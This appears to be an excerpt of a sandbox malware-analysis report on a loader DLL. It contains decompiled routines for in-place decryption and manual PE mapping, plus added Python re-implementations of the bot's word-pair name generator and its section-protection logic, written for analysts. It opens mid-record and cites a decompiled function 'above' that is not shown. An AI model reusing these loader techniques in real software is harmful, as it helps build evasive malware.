                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                • String ID:
                                • API String ID: 3214092121-3916222277
                                • Opcode ID: 65c3c1a015d04e0ebcc3e1fd25c69db79b4b635042d23bca9955e57d00a62c2d
                                • Instruction ID: 0f9fc417722d98c4d44b3bb12e4528df0543dc5ffd7178fd66ce554334c110f7
                                • Opcode Fuzzy Hash: 65c3c1a015d04e0ebcc3e1fd25c69db79b4b635042d23bca9955e57d00a62c2d
                                • Instruction Fuzzy Hash: 91519131A00218EBDF21DF99C8847BDBBB6FF55314F59806AF8559B211C770EA41DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%
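Added example (not code from the sample and not part of the Joe Sandbox report): a Python re-implementation of the behaviour visible in the decompilation of E00D42D74 above. The decompiled function tokenises a CR/LF-delimited word list, uppercases the first character of each token, refuses lists of 0x20 words or fewer (error 0xb), and then builds a table of names by drawing two word indices per name from a 32-bit LCG (seed = seed * 0x19660d + 0x3c6ef35f), joining the two words with lstrcpy/lstrcat and comparing the candidate against every earlier entry with lstrcmp. The constants and checks come from the decompilation; the following are assumptions: the indices are taken as unsigned, a duplicate is regenerated without consuming a table slot (the 22%-quality decompiled loop is ambiguous there), the word list is constructed for the example, and the seed is arbitrary.

```python
"""Re-implementation of the word-pair name generator seen in E00D42D74.

Added example, not code from the sample or from the Joe Sandbox report.
Taken from the decompilation: the LCG constants 0x19660d / 0x3c6ef35f, the
CR/LF tokeniser with first-character uppercasing, the "more than 0x20 words"
check and the lstrcmp duplicate test.  Assumed: unsigned index arithmetic and
that a duplicate is regenerated without consuming a table slot.
"""

LCG_MUL = 0x19660D
LCG_ADD = 0x3C6EF35F
MASK32 = 0xFFFFFFFF


def lcg_next(seed: int) -> int:
    """One step of the 32-bit LCG: seed = seed * 0x19660d + 0x3c6ef35f (mod 2^32)."""
    return (seed * LCG_MUL + LCG_ADD) & MASK32


def split_words(blob: bytes) -> list:
    """Tokenise on 0x0d / 0x0a like the scan loop and uppercase a leading 'a'..'z'
    (the decompilation subtracts 0x20 when _t83 - 0x61 <= 0x19)."""
    words = []
    for raw in blob.replace(b"\r", b"\n").split(b"\n"):
        if not raw:                      # consecutive delimiters produce no token
            continue
        first = raw[0]
        if 0x61 <= first <= 0x7A:
            first -= 0x20
        words.append((bytes([first]) + raw[1:]).decode("ascii"))
    return words


def generate_names(seed: int, wordlist: bytes) -> list:
    """Produce len(words) unique Word1Word2 names; [] where the original fails
    with error 0xb because the list has 0x20 words or fewer."""
    words = split_words(wordlist)
    count = len(words)
    if count <= 0x20:
        return []
    names = []
    while len(names) < count:
        seed = lcg_next(seed)            # first draw (_t110 in the decompilation)
        first = words[seed % count]
        seed = lcg_next(seed)            # second draw (_v20), fed back as the new seed
        second = words[seed % count]
        candidate = first + second       # lstrcpy + lstrcat
        if candidate in names:           # lstrcmp == 0 against an earlier entry
            continue                     # assumed: retry without consuming a slot
        names.append(candidate)
    return names


# Constructed 40-word list (not the sample's own list), CR/LF delimited.
SAMPLE_WORDLIST = b"\r\n".join(
    w.encode("ascii") for w in (
        "apple banana cherry delta eagle forest garden harbor island jungle "
        "kernel lemon meadow nickel ocean planet quartz river silver tower "
        "umbrella valley window xenon yellow zephyr anchor bridge castle desert "
        "ember falcon glacier hammer iron jasper knight lantern marble north"
    ).split()
)

if __name__ == "__main__":
    # Seed chosen arbitrarily for the demonstration.
    for name in generate_names(0x12345678, SAMPLE_WORDLIST)[:5]:
        print(name)
```

Fed with the seed and word list recovered from a sample's configuration, the returned list corresponds to the pointer table the original stores at 0xd4d278, which is what an analyst needs to predict the names the bot derives rather than collecting them one run at a time.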

                                C-Code - Quality: 100%
                                			E00D45319(void* __edx) {
                                				void* _v8;
                                				int _v12;
                                				WCHAR* _v16;
                                				void* __edi;
                                				void* __esi;
                                				void* _t23;
                                				intOrPtr _t24;
                                				void* _t26;
                                				intOrPtr _t32;
                                				intOrPtr _t35;
                                				intOrPtr _t38;
                                				intOrPtr _t42;
                                				void* _t45;
                                				void* _t50;
                                				void* _t52;
                                
                                				_t50 = __edx;
                                				_v12 = 0;
                                				_t23 = E00D4155A(0,  &_v8); // executed
                                				if(_t23 != 0) {
                                					_v8 = 0;
                                				}
                                				_t24 =  *0xd4d2a8; // 0x253a5a8
                                				_t4 = _t24 + 0xd4edc0; // 0x3289368
                                				_t5 = _t24 + 0xd4ed68; // 0x4f0053
                                				_t26 = E00D45D79( &_v16, _v8, _t5, _t4); // executed
                                				_t45 = _t26;
                                				if(_t45 == 0) {
                                					StrToIntExW(_v16, 0,  &_v12);
                                					_t45 = 8;
                                					if(_v12 < _t45) {
                                						_t45 = 1;
                                						__eflags = 1;
                                					} else {
                                						_t32 =  *0xd4d2a8; // 0x253a5a8
                                						_t11 = _t32 + 0xd4edb4; // 0x328935c
                                						_t48 = _t11;
                                						_t12 = _t32 + 0xd4ed68; // 0x4f0053
                                						_t52 = E00D4272D(_t11, _t12, _t11);
                                						_t59 = _t52;
                                						if(_t52 != 0) {
                                							_t35 =  *0xd4d2a8; // 0x253a5a8
                                							_t13 = _t35 + 0xd4edfe; // 0x30314549
                                							if(E00D45B05(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                                								_t61 =  *0xd4d25c - 6;
                                								if( *0xd4d25c <= 6) {
                                									_t42 =  *0xd4d2a8; // 0x253a5a8
                                									_t15 = _t42 + 0xd4ec0a; // 0x52384549
                                									E00D45B05(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                								}
                                							}
                                							_t38 =  *0xd4d2a8; // 0x253a5a8
                                							_t17 = _t38 + 0xd4edf8; // 0x32893a0
                                							_t18 = _t38 + 0xd4edd0; // 0x680043
                                							_t45 = E00D44538(_v8, 0x80000001, _t52, _t18, _t17);
                                							HeapFree( *0xd4d238, 0, _t52);
                                						}
                                					}
                                					HeapFree( *0xd4d238, 0, _v16);
                                				}
                                				_t54 = _v8;
                                				if(_v8 != 0) {
                                					E00D44FF0(_t54);
                                				}
                                				return _t45;
                                			}


                                Disassembly: only the address column (0x00d45319 to 0x00d4542b) survived extraction; the instruction text is not available on this page.

                                APIs
                                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03289368,00000000,?,74E5F710,00000000,74E5F730), ref: 00D45368
                                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,032893A0,?,00000000,30314549,00000014,004F0053,0328935C), ref: 00D45405
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00D47CCB), ref: 00D45417
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID: Ut
                                • API String ID: 3298025750-8415677
                                • Opcode ID: 6b035a61663a31932b8b356badbf5f5891964559fc02e356d90887ff8f00a410
                                • Instruction ID: a2ba23657e651b8231a25724ae60737a23e5c7f299bc205a77302710d23903d3
                                • Opcode Fuzzy Hash: 6b035a61663a31932b8b356badbf5f5891964559fc02e356d90887ff8f00a410
                                • Instruction Fuzzy Hash: 5A317E36900218FFDB11EF94EC84EAABBBDEB45700F1501A5F604DB266D7B19A44DB70
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 57%
                                			E00D42C58(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                				void* _v8;
                                				void* __edi;
                                				void* _t13;
                                				intOrPtr _t18;
                                				void* _t24;
                                				void* _t30;
                                				void* _t36;
                                				void* _t40;
                                				intOrPtr _t42;
                                
                                				_t36 = __edx;
                                				_t32 = __ecx;
                                				_push(__ecx);
                                				_push(__ecx);
                                				_t42 =  *0xd4d340; // 0x3289b20
                                				_push(0x800);
                                				_push(0);
                                				_push( *0xd4d238);
                                				if( *0xd4d24c >= 5) {
                                					_t13 = RtlAllocateHeap(); // executed
                                					if(_t13 == 0) {
                                						L6:
                                						_t30 = 8;
                                						L7:
                                						if(_t30 != 0) {
                                							L10:
                                							 *0xd4d24c =  *0xd4d24c + 1;
                                							L11:
                                							return _t30;
                                						}
                                						_t44 = _a4;
                                						_t40 = _v8;
                                						 *_a16 = _a4;
                                						 *_a20 = E00D42C0D(_t44, _t40);
                                						_t18 = E00D431A8(_t40, _t44);
                                						if(_t18 != 0) {
                                							 *_a8 = _t40;
                                							 *_a12 = _t18;
                                							if( *0xd4d24c < 5) {
                                								 *0xd4d24c =  *0xd4d24c & 0x00000000;
                                							}
                                							goto L11;
                                						}
                                						_t30 = 0xbf;
                                						E00D45433();
                                						HeapFree( *0xd4d238, 0, _t40);
                                						goto L10;
                                					}
                                					_t24 = E00D49BF1(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
                                					L5:
                                					_t30 = _t24;
                                					goto L7;
                                				}
                                				if(RtlAllocateHeap() == 0) {
                                					goto L6;
                                				}
                                				_t24 = E00D45450(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
                                				goto L5;
                                			}


                                Disassembly: only the address column (0x00d42c58 to 0x00d42d1f) survived extraction; the instruction text is not available on this page.

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 00D42C7C
                                  • Part of subcall function 00D45450: GetTickCount.KERNEL32 ref: 00D45464
                                  • Part of subcall function 00D45450: wsprintfA.USER32 ref: 00D454B4
                                  • Part of subcall function 00D45450: wsprintfA.USER32 ref: 00D454D1
                                  • Part of subcall function 00D45450: wsprintfA.USER32 ref: 00D454FD
                                  • Part of subcall function 00D45450: HeapFree.KERNEL32(00000000,?), ref: 00D4550F
                                  • Part of subcall function 00D45450: wsprintfA.USER32 ref: 00D45530
                                  • Part of subcall function 00D45450: HeapFree.KERNEL32(00000000,?), ref: 00D45540
                                  • Part of subcall function 00D45450: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00D4556E
                                  • Part of subcall function 00D45450: GetTickCount.KERNEL32 ref: 00D4557F
                                • RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 00D42C9A
                                • HeapFree.KERNEL32(00000000,00000002,00D47D16,?,00D47D16,00000002,?,?,00D4312C,?), ref: 00D42CF7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Heap$wsprintf$AllocateFree$CountTick
                                • String ID: Ut
                                • API String ID: 1676223858-8415677
                                • Opcode ID: 2bba14978c796a027bde17aa6b91da9151f0e01d3fd8de979f836968408c9259
                                • Instruction ID: 634103461d70fb557551307e17bf04fc9f0ef074e22c9becd1fa29db487cbc90
                                • Opcode Fuzzy Hash: 2bba14978c796a027bde17aa6b91da9151f0e01d3fd8de979f836968408c9259
                                • Instruction Fuzzy Hash: 23218E79201204EBCB119F59ECC4EAE3BADFB4A305F104026F901EB261DB70D940DBB1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 87%
                                			// Manual-mapper step: applies per-section page protections to a freshly mapped PE image.
                                			// __eax = IMAGE_NT_HEADERS of the image, _a4 = mapped image base.
                                			// *0x10004140 is the value that E10001B6F (below) requires to be 0x69b25f44 before it
                                			// hands the image on, so the "_t57 - 0x69b25f.." immediates resolve to the plain PAGE_*
                                			// constants (4 = PAGE_READWRITE, 2 = PAGE_READONLY, 0x20 = PAGE_EXECUTE_READ,
                                			// 0x40 = PAGE_EXECUTE_READWRITE) and "0x7c211d88 + _t57 * 0x28" wraps modulo 2^32 to
                                			// 0x28 = sizeof(IMAGE_SECTION_HEADER). The bt tests probe bits of Section.Characteristics
                                			// (+0x24); the decompiler dropped the bit-index operand, but the branch shape is that of
                                			// IMAGE_SCN_MEM_EXECUTE / IMAGE_SCN_MEM_READ / IMAGE_SCN_MEM_WRITE checks.
                                			E10001D31(void* __eax, void* _a4) {
                                				signed int _v8;
                                				signed int _v12;
                                				signed int _v16;
                                				long _v20;
                                				int _t43;
                                				long _t54;
                                				signed int _t57;
                                				void* _t58;
                                				signed int _t60;
                                
                                				_v12 = _v12 & 0x00000000; // last error; returned to the caller
                                				_t57 =  *0x10004140; // constant-deobfuscation key, 0x69b25f44 after E10001B6F succeeded
                                				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18; // first IMAGE_SECTION_HEADER = OptionalHeader (+0x18) + SizeOfOptionalHeader (+0x14)
                                				_v16 =  *(__eax + 6) & 0x0000ffff; // FileHeader.NumberOfSections
                                				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed; headers -> PAGE_READWRITE, +0x54 = OptionalHeader.SizeOfHeaders (PE32)
                                				_v8 = _v8 & 0x00000000; // section index
                                				if(_v16 <= 0) {
                                					L12:
                                					return _v12;
                                				} else {
                                					goto L1;
                                				}
                                				while(1) {
                                					L1:
                                					_t60 = _v12;
                                					if(_t60 != 0) { // stop at the first VirtualProtect failure
                                						goto L12;
                                					}
                                					asm("bt [esi+0x24], eax"); // Characteristics & IMAGE_SCN_MEM_EXECUTE ?
                                					if(_t60 >= 0) {
                                						asm("bt [esi+0x24], eax"); // non-executable: Characteristics & IMAGE_SCN_MEM_READ ?
                                						if(__eflags >= 0) {
                                							L8:
                                							_t54 = _t57 - 0x69b25f40; // PAGE_READWRITE (also used when no R flag is set at all)
                                							L9:
                                							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed; base + Section.VirtualAddress, Section.Misc.VirtualSize
                                							if(_t43 == 0) {
                                								_v12 = GetLastError();
                                							}
                                							_v8 = _v8 + 1;
                                							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28; // == _t58 + 0x28: next section header
                                							if(_v8 < _v16) {
                                								continue;
                                							} else {
                                								goto L12;
                                							}
                                						}
                                						asm("bt [esi+0x24], eax"); // readable: Characteristics & IMAGE_SCN_MEM_WRITE ?
                                						_t54 = _t57 - 0x69b25f42; // PAGE_READONLY
                                						if(__eflags >= 0) {
                                							goto L9;
                                						}
                                						goto L8; // writable -> PAGE_READWRITE
                                					}
                                					asm("bt [esi+0x24], eax"); // executable: Characteristics & IMAGE_SCN_MEM_WRITE ?
                                					if(_t60 >= 0) {
                                						_t54 = _t57 - 0x69b25f24; // PAGE_EXECUTE_READ
                                					} else {
                                						_t54 = _t57 - 0x69b25f04; // PAGE_EXECUTE_READWRITE
                                					}
                                					goto L9;
                                				}
                                				goto L12;
                                			}

                                Statement addresses (one entry per decompiled statement, in order; 0x00000000 marks a statement without its own address): 0x10001d3b 0x10001d48 0x10001d4e 0x10001d5a 0x10001d6a 0x10001d6c 0x10001d74 0x10001e09 0x10001e10 0x00000000 0x00000000 0x00000000 0x10001d7a 0x10001d7a 0x10001d7a 0x10001d7e 0x00000000 0x00000000 0x10001d8a 0x10001d8e 0x10001db2 0x10001db6 0x10001dca 0x10001dca 0x10001dd0 0x10001ddf 0x10001de3 0x10001deb 0x10001deb 0x10001df3 0x10001df6 0x10001e03 0x00000000 0x00000000 0x00000000 0x00000000 0x10001e03 0x10001dbe 0x10001dc2 0x10001dc8 0x00000000 0x00000000 0x00000000 0x10001dc8 0x10001d96 0x10001d9a 0x10001da4 0x10001d9c 0x10001d9c 0x10001d9c 0x00000000 0x10001d9a 0x00000000

                                APIs
                                • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 10001D6A
                                • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 10001DDF
                                • GetLastError.KERNEL32 ref: 10001DE5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProtectVirtual$ErrorLast
                                • String ID: @Mt MtTt
                                • API String ID: 1469625949-608512568
                                • Opcode ID: a625307ab09a2c47fcfcfd1582debcee65c2d17baa81293c942d2690ff0c9830
                                • Instruction ID: e700519fbe02ce22486df0362471e60f157106dcaaf3df0265f5a6019b736344
                                • Opcode Fuzzy Hash: a625307ab09a2c47fcfcfd1582debcee65c2d17baa81293c942d2690ff0c9830
                                • Instruction Fuzzy Hash: 21216B7180020AEFDB14CF95C885AEAF7F8FF48385F01445AE606D7019E3B4AA68CB94
                                Uniqueness

                                Uniqueness Score: -1.00%
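
E10001D31 above is the section-protection pass of a manual PE mapper with its constants obfuscated. The following Python is an added worked example, not code from the sample or from this report: it re-derives the PAGE_* values and the 0x28 section stride from the immediates shown in the decompilation and applies the same decision tree to a constructed PE header. Two assumptions are made: that *0x10004140 holds 0x69b25f44 when E10001D31 runs (E10001B6F, further down, only copies the decrypted image back after its check yields exactly that value), and that the three `bt [esi+0x24], eax` tests, whose bit-index operand the decompiler dropped, probe IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ and IMAGE_SCN_MEM_WRITE in the order that makes the branch tree produce sensible protections. The section table is constructed inline and is not taken from 9091.dll.

```python
"""
Added example (not code from 9091.dll or from the Joe Sandbox report): the section-protection
pass of E10001D31 with its constants resolved.

Assumptions (also stated in the text above):
  * *0x10004140 == 0x69b25f44 when E10001D31 runs, the value E10001B6F's check requires;
  * the three `bt [esi+0x24], eax` tests probe IMAGE_SCN_MEM_EXECUTE / READ / WRITE; the
    decompiler lost the bit-index operand, so the assignment is inferred from the branches.
The PE header below is constructed for the example, not taken from the sample.
"""
import struct

KEY = 0x69B25F44  # value the global at 0x10004140 must hold (checked in E10001B6F)

# Constants exactly as the sample forms them: key minus an immediate, so the plain
# PAGE_* values never appear in the binary.
PAGE_READONLY          = (KEY - 0x69B25F42) & 0xFFFFFFFF  # 0x02
PAGE_READWRITE         = (KEY - 0x69B25F40) & 0xFFFFFFFF  # 0x04
PAGE_EXECUTE_READ      = (KEY - 0x69B25F24) & 0xFFFFFFFF  # 0x20
PAGE_EXECUTE_READWRITE = (KEY - 0x69B25F04) & 0xFFFFFFFF  # 0x40
# "_t58 + 0x7c211d88 + _t57 * 0x28" wraps modulo 2**32 to _t58 + sizeof(IMAGE_SECTION_HEADER)
SECTION_STRIDE = (0x7C211D88 + KEY * 0x28) & 0xFFFFFFFF

IMAGE_SCN_MEM_EXECUTE = 0x20000000  # bit 29 of Section.Characteristics
IMAGE_SCN_MEM_READ    = 0x40000000  # bit 30
IMAGE_SCN_MEM_WRITE   = 0x80000000  # bit 31


def protection_for(characteristics):
    """Same decision tree as the bt/branch ladder in E10001D31 (bit assignment assumed)."""
    if characteristics & IMAGE_SCN_MEM_EXECUTE:
        if characteristics & IMAGE_SCN_MEM_WRITE:
            return PAGE_EXECUTE_READWRITE
        return PAGE_EXECUTE_READ
    if not characteristics & IMAGE_SCN_MEM_READ:
        return PAGE_READWRITE  # no R flag at all: the sample falls back to RW
    if characteristics & IMAGE_SCN_MEM_WRITE:
        return PAGE_READWRITE
    return PAGE_READONLY


def plan_protections(image, base=0x10000000):
    """
    Walk the headers the way E10001D31 does (__eax = IMAGE_NT_HEADERS, _a4 = mapped base)
    and return the (address, size, protection) triples it would hand to VirtualProtect.
    Offsets are the documented PE32 layout: FileHeader.NumberOfSections at +6,
    FileHeader.SizeOfOptionalHeader at +0x14, OptionalHeader.SizeOfHeaders at +0x54, the
    section table at +0x18 + SizeOfOptionalHeader, and VirtualSize / VirtualAddress /
    Characteristics at +8 / +0xC / +0x24 of each 0x28-byte entry.
    """
    nt = struct.unpack_from("<I", image, 0x3C)[0]  # e_lfanew
    if image[nt:nt + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    num_sections = struct.unpack_from("<H", image, nt + 6)[0]
    size_opt = struct.unpack_from("<H", image, nt + 0x14)[0]
    size_of_headers = struct.unpack_from("<I", image, nt + 0x54)[0]

    calls = [(base, size_of_headers, PAGE_READWRITE)]  # first VirtualProtect: headers -> RW
    sec = nt + 0x18 + size_opt
    for _ in range(num_sections):
        vsize, vaddr = struct.unpack_from("<II", image, sec + 8)
        chars = struct.unpack_from("<I", image, sec + 0x24)[0]
        calls.append((base + vaddr, vsize, protection_for(chars)))
        sec += SECTION_STRIDE
    return calls


def build_test_image():
    """Constructed PE32 header with four typical sections (example data, not the sample)."""
    sections = [
        (b".text",  0x1000, 0x1000, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
        (b".rdata", 0x0400, 0x2000, IMAGE_SCN_MEM_READ),
        (b".data",  0x0200, 0x3000, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
        (b".bss",   0x0100, 0x4000, 0),  # no R/W/X bit set at all
    ]
    e_lfanew, size_opt = 0x40, 0xE0  # 0xE0 = PE32 optional header size
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_opt, 0x2102)
    opt = bytearray(size_opt)
    struct.pack_into("<H", opt, 0, 0x10B)     # PE32 magic
    struct.pack_into("<I", opt, 0x3C, 0x400)  # SizeOfHeaders
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, vsize, 0, 0, 0, 0, 0, chars)
        for name, vsize, vaddr, chars in sections
    )
    return dos + b"PE\0\0" + file_hdr + bytes(opt) + table


if __name__ == "__main__":
    for addr, size, prot in plan_protections(build_test_image()):
        print(f"VirtualProtect(0x{addr:08x}, 0x{size:x}, 0x{prot:02x})")
```

The resolved stride is the useful part for triage: once the single key value is known, every `key - immediate` expression in the module collapses to an ordinary constant, so the same substitution can be applied to the other `_t57 - 0x69b25f..` sites without re-running the decryption in E10001B6F.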

                                APIs
                                • SysAllocString.OLEAUT32(80000002), ref: 00D48A76
                                • SysAllocString.OLEAUT32(00D44BD8), ref: 00D48ABA
                                • SysFreeString.OLEAUT32(00000000), ref: 00D48ACE
                                • SysFreeString.OLEAUT32(00000000), ref: 00D48ADC
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: cbd50589c01f36fde8ec1bd7e135262b188103b5ac96bd730e7918b2334674e9
                                • Instruction ID: 6af93e47743f40de83b76014d689519346f298616fb57d009db3e960ee3ae38f
                                • Opcode Fuzzy Hash: cbd50589c01f36fde8ec1bd7e135262b188103b5ac96bd730e7918b2334674e9
                                • Instruction Fuzzy Hash: 5031FA76900249EFCB05DF98D8C58AE7BB9FF48340B24882AF506DB250EB719981DF75
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 86%
                                			// Decrypt-and-verify pass over the region at *0x10004130 + _v24 (length _v16), both located
                                			// by E10002016. Every 0x1000-byte page is decrypted into a scratch buffer; after each page a
                                			// check value is recomputed from three dwords of the decrypted data and stored in *0x10004140.
                                			// Only if that value ends at 0x69b25f44 is the plaintext copied back over the original.
                                			// E10001D31 later uses *0x10004140 as its constant-deobfuscation key, so a failed check also
                                			// breaks that routine. Return values follow Win32 error codes.
                                			E10001B6F(void* __edi, intOrPtr _a4) {
                                				signed int _v8;
                                				intOrPtr _v12;
                                				unsigned int _v16;
                                				intOrPtr _v20;
                                				char _v24;
                                				void* _v28;
                                				intOrPtr _v32;
                                				intOrPtr _v36;
                                				void* _v40;
                                				signed int _v48;
                                				signed int _v52;
                                				intOrPtr _t46;
                                				void* _t53;
                                				intOrPtr _t54;
                                				intOrPtr _t57;
                                				signed int _t66;
                                				intOrPtr _t68;
                                				intOrPtr _t83;
                                				void* _t84;
                                
                                				_t83 =  *0x10004130; // module base the encrypted region is relative to
                                				_t46 = E10002016(_t83,  &_v24,  &_v16); // returns region offset (_v24) and length (_v16)
                                				_v20 = _t46;
                                				if(_t46 == 0) {
                                					asm("sbb ebx, ebx");
                                					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc); // page count, rounded up (decompiler rendering of the sbb/neg idiom)
                                					_t84 = _t83 + _v24; // start of the encrypted region
                                					_v40 = _t84;
                                					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed; MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE scratch buffer
                                					_v28 = _t53;
                                					if(_t53 == 0) {
                                						_v20 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                					} else {
                                						_v8 = _v8 & 0x00000000; // page index
                                						if(_t66 <= 0) {
                                							_t54 =  *0x10004140; // nothing to decrypt: keep the current check value
                                						} else {
                                							_t68 = _a4;
                                							_t57 = _t53 - _t84; // scratch minus original: converts an original address into its scratch copy
                                							_t13 = _t68 + 0x100051a7; // 0x100051a7
                                							_v32 = _t57;
                                							_v36 = _t57 + _t13; // scratch-side address of the dwords the check value is computed from
                                							_v12 = _t84;
                                							while(1) {
                                								asm("movsd");
                                								asm("movsd");
                                								asm("movsd");
                                								E1000185E(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400); // decrypt one page into the scratch buffer; per-page key mixes _v52 ^ _v48, the page index _v8 and the caller-supplied _a4
                                								_v12 = _v12 + 0x1000; // next page
                                								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4)); // check value from the decrypted data
                                								_v8 = _v8 + 1;
                                								 *0x10004140 = _t54; // published as the key E10001D31 reads
                                								if(_v8 >= _t66) {
                                									break;
                                								}
                                								_t57 = _v32;
                                							}
                                						}
                                						if(_t54 != 0x69b25f44) {
                                							_v20 = 9; // ERROR_INVALID_BLOCK: check failed, original left untouched
                                						} else {
                                							memcpy(_v40, _v28, _v16); // plaintext replaces the encrypted region in place
                                						}
                                						VirtualFree(_v28, 0, 0x8000); // executed; MEM_RELEASE
                                					}
                                				}
                                				return _v20;
                                			}


                                Statement addresses (one entry per decompiled statement, in order; 0x00000000 marks a statement without its own address): 0x10001b76 0x10001b86 0x10001b8b 0x10001b90 0x10001ba5 0x10001bac 0x10001bb1 0x10001bc2 0x10001bc5 0x10001bcb 0x10001bd0 0x10001c83 0x10001bd6 0x10001bd6 0x10001bdc 0x10001c4b 0x10001bde 0x10001bde 0x10001be1 0x10001be3 0x10001beb 0x10001bee 0x10001bf1 0x10001bf9 0x10001c04 0x10001c05 0x10001c06 0x10001c23 0x10001c31 0x10001c38 0x10001c3b 0x10001c3e 0x10001c46 0x00000000 0x00000000 0x10001bf6 0x10001bf6 0x10001c48 0x10001c55 0x10001c6a 0x10001c57 0x10001c60 0x10001c65 0x10001c7b 0x10001c7b 0x10001c8a 0x10001c90

                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,74E063F0,00003000,00000004,00000030,00000000,74E063F0,00000000,?,?,?,?,?,?,100015B5,00000000), ref: 10001BC5
                                • memcpy.NTDLL(?,100015B5,74E063F0,?,?,?,?,?,?,100015B5,00000000,00000030,74E063F0,00000000), ref: 10001C60
                                • VirtualFree.KERNELBASE(100015B5,00000000,00008000,?,?,?,?,?,?,100015B5,00000000), ref: 10001C7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFreememcpy
                                • String ID: Sep 21 2021
                                • API String ID: 4010158826-1195158264
                                • Opcode ID: 4a200aa85f58a821f5f9962b291cb76fc4535fc65e25120b76f29fa374006b7d
                                • Instruction ID: 952fea5554e6ea9c6b6d701a00e5359ec4800a23aeca9bf1122bd908d9cf0ac5
                                • Opcode Fuzzy Hash: 4a200aa85f58a821f5f9962b291cb76fc4535fc65e25120b76f29fa374006b7d
                                • Instruction Fuzzy Hash: 75312175D40219EBEB01CF94CD81BDEB7B8FF08344F104169EA05BB245DB71AA45CB94
